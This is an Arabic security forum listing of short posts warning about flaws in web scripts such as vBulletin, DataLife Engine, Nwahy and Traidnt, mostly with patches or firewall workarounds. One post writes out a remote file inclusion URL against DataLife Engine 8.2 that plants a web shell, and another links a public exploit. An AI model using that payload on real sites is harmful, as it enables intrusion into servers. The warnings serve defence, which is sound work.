ثغرة

  1. SH3A3-Q

    لكل من واجه مشكله في ترقيع ثغرة vBulletin 3.8.4 PL1 XSS تم الحل

    الاخوان الذين واجهو مشكلة في الترقيع كان السبب خلل في تعديل الملفات وعدلت على الملفات بالطريقة الصحيحه وبما ان ترايدنت يمنع تحميل نسخ الفيبولتن الرجاء الذهاب الى الموضوع التالي وتحميل الملفات http://www.3nor.com/vb/t467.html#post1429 ودمتم بخير (( منقول بتقنية RSS )) اي ملاحظة...
  2. SH3A3-Q

    [ثغره] : ثغرة امنية في مجلة داتا لايف الاصدار الاخير (8.2)

    السلام عليكم للتنبيه فقط، توجد ثغرة امنية في مجلة داتا لايف انجين DataLife Engine الاصدار الاخير (8.2) ويمكن رفع ملف الشل من خلال هذه الثغرة: رمز Code: www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?] اطرح هذا الموضوع لأخذ الحذر فقط، ونرجو عدم استخدام الرابط في ما يسيء للآخرين
  3. SH3A3-Q

    ثغرة خطيرة في سكربت Nwahy Book

    السلام عليكم ورحمة الله وبركاته كيفكم اخواني ان شاء الله دائما بخير المهم: من كم يوم خبرت أخونا صاحب موقع نواحي بوجود ثغرة في سكربت مكتبة الكتب وقد كان متجاوباً معي والترقيع حالياً هو وضع جدار ناري على مجلد includes فقط وسأنشر الثغرة قريباُ بإذن الله والسلام عليكم أرجو منكم دعوة...
  4. SH3A3-Q

    [ترقيع] ثغرة XSS في 4images من النسخة 1.7 - 1.7.7

    السـلام عليكم ورحمة الله وبركاته .} آليــــــوم قمت بزيآرة الموقع الرسمي للـ 4Images و لقيت تنبه بثغرة Xss في النسخ 1.7 حتى النسخة الجديدة 1.7.7 .. طريقة الترقيع : افتح ملف : functions.php الموجـود في مجلد includes و ابحث فيه عن / رمز PHP: return $url; و استبدله...
  5. SH3A3-Q

    تنبيه بخصوص دليل المواقع الاصدار 2.2 و 2.1 - ثغرة

    السلام عليكم ورحمة الله وبركاته تنبيه خاص بدليل المواقع الاصدار 2.2 أخبرني شخص جزاه الله عنا كل خير وبارك الله فيه عن وجود ملف به كود مشبوه بداخل الدليل وأنا لم أضع هذا الكود أبدا ولكن احتمال كبير ان السيرفر اللي عليه موقعي تم اختراقه وتم زرق الكود بداخل الملفات عموما الكود موجود بداخل الملف...
  6. SH3A3-Q

    حل ثغرة الاعلان للنسخة 384

    السلام عليكم ورحمة الله وبركاته أخوتي الافاضل الكرام صراحتا أن اليوم قريت الخبر ألي ناشرة أحد الاخوة بخصوص الثغرة وجربتها وفعلا الثغرة نجت ... الاخ سعيد العطوي ومشكور كان كاتب حل لهاي الثغرة وجربت لكن لم ينجح الحل من الاخ الكريم... بعدها حاولت أن أجد لو حل مؤقت .... ونجحت معي الطريقة ...
  7. SH3A3-Q

    [درس] : الحماية من ثغرة الفلود و الإسبام و الإغراق

    السلام عليكم و رحمة الله و بركاته , بسم الله الرحمن الرحيم اقتباس: مصدر الموضوع : http://portal.hisham4ws.net/4-sec-flood.html الموضوع منقول من : http://forum.hisham4ws.net/h10.html درسنا اليوم هو الحماية من ثغرة الفلود و الإسبام و للحماية من هذه الثغرة لابد من تفعيل...
  8. SH3A3-Q

    الموضوع : ( ثغرة في سكربت الدعم الفني Kayako اخر اصدار !!! تحذير مهم جدآ آ )

    بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته ثغرة في سكربت الدعم الفني kayako بجميع اصداراته نوع الثغرة xsrf تسمح للمخترق بالتغير البريد + الباسوورد + اليوزرنيم للمدير الترقيع وضع جدار ناري على لوحة التحكم ================================================== ========== كود الثغرة...
  9. SH3A3-Q

    حل ثغرة دليل دنيا الخليج الأصدار 4.0 , 4.5

    السلام عليكم دنيا الخليج - الدعم الفني عميلنا الكريم لقد تم اكتشاف ثغرة في السكربت وتم ترقيعها على الفور وضروري جداً ان يتم رفع التعديلات الترقيع للنسخة 4.5 http://www.a21a.com/rabet45.zip ..................................... الترقيع للنسخة 4.0...
  10. SH3A3-Q

    ثغرة في سكريبت رابط دنيا الخليج

    السلام عليكم ورحمة الله تعالى وبركاته الثغرة من نوع Database Disclousre يعني تحمل القاعدة البيانات الثغرهـ في سكربت رابط 4.5 للحين ما ادري وش الترقيـع بس ياليت المشرف يحط ايميلـه او يضيفني
  11. SH3A3-Q

    عاجل ثغرة جديده فى برنامج إنفنتي Infinity 2.0.5

    السلام عليكم عاجل ثغرة جديده فى برنامج إنفنتي Infinity 2.0.5 بعد الترقيع حتى بدون تعليق الترقيع هنا فاشل بدون جدار نارى الحل الوحيد جدار نارى رابط الموقع المخترق صور توضح الدخول مرفقه بالتوفيق لحمايه اكثر الصور المصغرة المرفقة
  12. SH3A3-Q

    [ترقيع] ثغرة فى برنامج إنفنتي Infinity 2.0.5

    بسم الله الرحمن الرحيم تم اكتشاف ثغرة في ملف cp/profile.php الملف في مجلد لوحة التحكم cp علماً أن هذه الثغرة لا تأثير لها في حالة وجود جدار حماية على لوحة التحكم لكن يجب ترقيع الثغرة في كل الحالات . الطريقة : مرفق ملفين بإسم : profile.zip profile_patch.zip فك الضغط على جهازك ثم ارفع...
  13. SH3A3-Q

    [ شرح ] : Mozilla تؤكد وجود ثغرة خطيرة في متصفح Firefox 3.5

    السلام عليكم ورحمة الله وبركاته - هذه الثغرة موجودة في اصدارات نظام التشغيل وندوز العقيم يبدوا أن المتصفح الذي انتظره الكثيرون يحمل ثغرة خطيرة , أتعلمون ثبته ولم يرتح بالي له خاصة مع مشكلة الألوان التي حصلت معي ولهذا حذفته , و الآن إليكم الخبر منقولا من هذا الرابط .... الخبر : أكدت شركة...
  14. SH3A3-Q

    [Fixed]: ترقيع ثغرة XSS في سكربت Nwahy dir-v2.1

    السلام عليكم ورحمة الله وبركاته السكربت اسمه : Nwahy dir الاصدارات المصابة : كلها المبرمج : أبو ليالي رابط الشركة : http://www.nwahy.com/showdownload-3105.html الثغرة في ملف admin.php في دالة $_POST الاستغلال : مسح .... لعدم اضرار المواقع العربية .... المتغيرات المصابة : متغيرين فقط user و...
  15. SH3A3-Q

    [ ثغرة خطيرة جدآ في سكربت ترآيدنت 2.0 جديدة بتآريخ اليوم

    السلآم عليكم ورحمة الله وبركآتة كيف حآلكم آخوآني ظهرت اليوم ثغرهـ خطيرة جدآ في سكربت Traidnt Up Version 2.0 وهـي من نوع : Blind SQL injection أنـآ حبيت أنوه فقط الترقيـع الحآلي جدآر نآري على اللوحة لحيـن يصدر الترقيع من طرف مبرمجي ترآيدنت :shiny01: أو نكمـل الترقيع أنـآ وصآحبي الشبـح...
  16. SH3A3-Q

    ثغرة جديدة في دليل نواحي الاصدار 2.1

    السلام عليكم ورحمة الله وبركاته في الفترة الاخيرة اكتشفت ثغرة في دليل مواقع نواحي وكان موقعي يتعرض لهجوم عن طريق هذه الثغرة الثغرة ليست الثغرة التي تجلب معلومات الادمن وايضا الثغرة لا يمكن للمخترق ان يضع فيها اندكس اختراق كل اللي بيقدر يسويه هو فقط اضافة مواقع بشكل سريع بدون ادخال بيانات...
  17. SH3A3-Q

    [ ترقيـع ] ثغرة فـي جميع سكربتآت Nwahy نوآحي ..!

    بسم الله الرحمن الرحيم :) السلآم عليكم ورحمة الله وبركآته طبعـآ آخوآني نزلت ثغرهـ في سكربت نوآحي Dir وكآن الترقيـع كله على بعـضه من الشركة نفسـهآ خآطى أسآسآ : ) لأن المـلف المصآب admincp بآآغلب ملفآتـه :bleh: طبعـآ أنـآ مكتشف الثغرة وهـي من نوع insecure Cookie =====================...
  18. SH3A3-Q

    [ثغرة] فى سكربت دليل نواحي Dir v2.1 تحذير للجميع

    السلام عليكم ورحمة الله تعالى وبركاته اخواني الكرام ظهر مؤخراً ثغرة فى دليل نواحي Dir v2.1 والترقيع المؤقت للثغره تغيير إسم مجلد دخول الادارة من رمز PHP: admincp الى اي اسم أخر ووضع جدار ناري عليه ولحين ظهور ترقيع للثغرة من موقع السكربت سيتم إبلاغكم...
  19. SH3A3-Q

    ثغرة اختراق دليل مواقع نواحي [تحذير]

    السلام عليكم كيف الحال قبل قليل رأيت المليورم منزل ثغره مكتوبة بلغة php يغير اسم الادمن والباسورد الحل :- ترقيع الثغره ان شاء الله ينزل الترقيع الاخ نواحي ,, والحل الثاني تغير مسار لوحة تحكم عشان مايدخلها وبالتوفيق للجميع لمشاهدة الثغره http://www.milw0rm.com/exploits/9087 نرجو افادة...
  20. SH3A3-Q

    تحدير تغرة vb من نوع sql

    السلام عليكم تحدير من تغرة جديدة من نوع sql على بعض منتديات vb الموضوع الاصلي للاكتشاف على منتدى php montadaphp الترقيع رمز PHP: if (is_numeric($id)) { //اكمل }else{ echo "No-exploit.Com"; exit(); } الموضوع الاصلي هنا
عودة
أعلى أسفل